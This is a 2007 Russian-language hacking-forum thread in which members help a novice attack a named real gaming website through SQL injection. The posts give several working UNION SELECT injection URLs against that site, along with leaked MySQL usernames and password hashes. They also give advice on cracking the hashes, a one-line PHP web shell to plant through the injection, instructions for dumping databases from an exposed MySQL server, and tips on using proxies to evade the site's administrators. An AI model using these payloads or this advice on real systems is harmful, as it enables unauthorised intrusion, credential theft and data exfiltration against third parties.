Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
24.09.2007, 12:37
|
|
Познавший АНТИЧАТ
Регистрация: 07.01.2007
Сообщений: 1,263
Провел на форуме:
3326855
Репутация:
702
|
|
Вопрос о скуле
При вводе:
Код:
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,user,password,6,7,8,1,1,1+from+mysql.user/*
Получаю
yroot
31a457464200908a
Но при вводе этого логина и паса в http://www.gamersblock.com/admin
мне пишет что не правильный пароль. Почему? |
|
|
24.09.2007, 12:43
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
31a457464200908a - не пароль, а хэш MySQL. Это раз. Во-вторых, не факт, что пара от БД подойдет к админке...
|
|
|
|
24.09.2007, 12:46
|
|
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085
Репутация:
576
|
|
yroot:31a457464200908a -хеш mysql,бруть его или оставь запрос тут |
|
|
|
24.09.2007, 13:19
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
От какого пользователся работает пага? То, что ты выковырял - учётные данные из системного каталога MySQL 4.X. То есть это реквизиты аккаунта суперпользователся для подключения к БД и они НИКАКОГО отношения к админке не имеют (исключая случай, что админ лопух и везде использует одни и те же логин/пароль). Если на их хосте МУСКЛЬ торчит яйцами наружу, то сбрутив пасс по админскому хешу, ты сможешь подключиться к ней извне и слить все имеющиеся там базы данных. Но я больше чем уверен, что мускль зацеплен только за localhost. В любом случае - ты можешь попытаться подобрать имена таблицы и столбцов, в которых хранятся реальные данные мемберов сломанной паги. Но если у тебя страничка крутится от root, тут есть возможность залить простенький вебшелл, а там уже возможности побогаче...
З.Ы. А ты уверен, что у полученной учётной записи y стоит перед root? Это не мусор?
Последний раз редактировалось groundhog; 24.09.2007 в 13:41..
|
|
|
|
24.09.2007, 13:29
|
|
Познавший АНТИЧАТ
Регистрация: 07.01.2007
Сообщений: 1,263
Провел на форуме:
3326855
Репутация:
702
|
|
З.Ы. А ты уверен, что у полученной учётной записи y стоит перед root? Это не мусор?
ну, код скули я оставил, посмотри. Вроде не лишнее.
сбрутив пасс по админскому хешу, ты сможешь подключиться к ней извне и слить все имеющиеся там базы данных
можно узнать, как єто делается? (можно и в виде ссылок).
просто это моя первая скуля, и хочется дальше развиваться в этом направлении
|
|
|
|
24.09.2007, 13:32
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
Подключиться можно с помощью putty, если под виндой сидишь, но, как сказал groundhog, тебя скорей всего ждет облом
|
|
|
|
24.09.2007, 13:33
|
|
Познавший АНТИЧАТ
Регистрация: 07.01.2007
Сообщений: 1,263
Провел на форуме:
3326855
Репутация:
702
|
|
тут есть возможность залить простенький вебшелл, а там уже возможности побогаче...
а это тогда о чём?
|
|
|
|
24.09.2007, 13:37
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
вобщем так:
Код:
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,aes_decrypt(aes_encrypt(USER_LOGIN,0x71),0x71),6,7,8,1,1,1+from+users/*
а поле с паролями сам ищи... я посмотрел, не нашел... но у меня и времени особо нет, чтоб это выискивать...
полученные данные скорее всего подойдут к админке (будем надеяться)
там еще форум есть phpBB, но кроме Anonymous никакой учетки выдрать неудалось:
Код:
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,aes_decrypt(aes_encrypt(username,0x71),0x71),6,7,8,1,1,1+from+phpbb.phpbb_users/*
зы:user() - mroca@localhost filepriv нет
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 24.09.2007 в 13:42..
|
|
|
|
24.09.2007, 13:40
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
тут есть возможность залить простенький вебшелл, а там уже возможности побогаче...
Я имею в виду, что если у тебя пага крутится от рута, то значит ты через скулю сможешь залить вебшелл, т.е. с помощью запроса создать файлик в контексте веб-сервера с содержимым типа:
<?php system($_GET["cmd"]); ?>
можно узнать, как єто делается? (можно и в виде ссылок).
Я имею в виду, в случае "торчания" мускла наружу и зная пасс админа, ты можешь любым mysql клиентом присоединиться к ихнему хосту и слить базу, тебе даже не нужно будет получать какие-то права на веб-сервере. Можно стандартно через MySQL Control Center, EMS MySQL Manager, MySQL Front... Клиентов дофига я не могу их тут перечислять... Только носки не забудь натянуть, а то злые админы в логах посмортят кто и когда что-то сливал.
|
|
|
|
24.09.2007, 13:57
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Там в табличке users (не mysql.user) есть пользователь mroca как и пользователь бд, так вот мож его пароль от бд подойдет к админке:
Код:
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,1,1,1+from+mysql.user%20where%20user=CHAR(109,114,111,99,97)/*
mroca:3785da1b4f22cdc9
расшифровывай хеш: 3785da1b4f22cdc9 (MySql) и пробуй
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Proxy FAQ
|
foreva |
Чужие Статьи |
12 |
04.01.2008 12:15 |
|
ЕсТь ВоПрос
|
Guma |
Чаты |
4 |
26.10.2005 21:48 |
|
ВОПРОС ЗНАТОКАМ
|
Hrust |
Болталка |
12 |
23.01.2005 19:31 |
|
Вопрос...
|
Black_Death |
Болталка |
1 |
05.01.2005 04:56 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
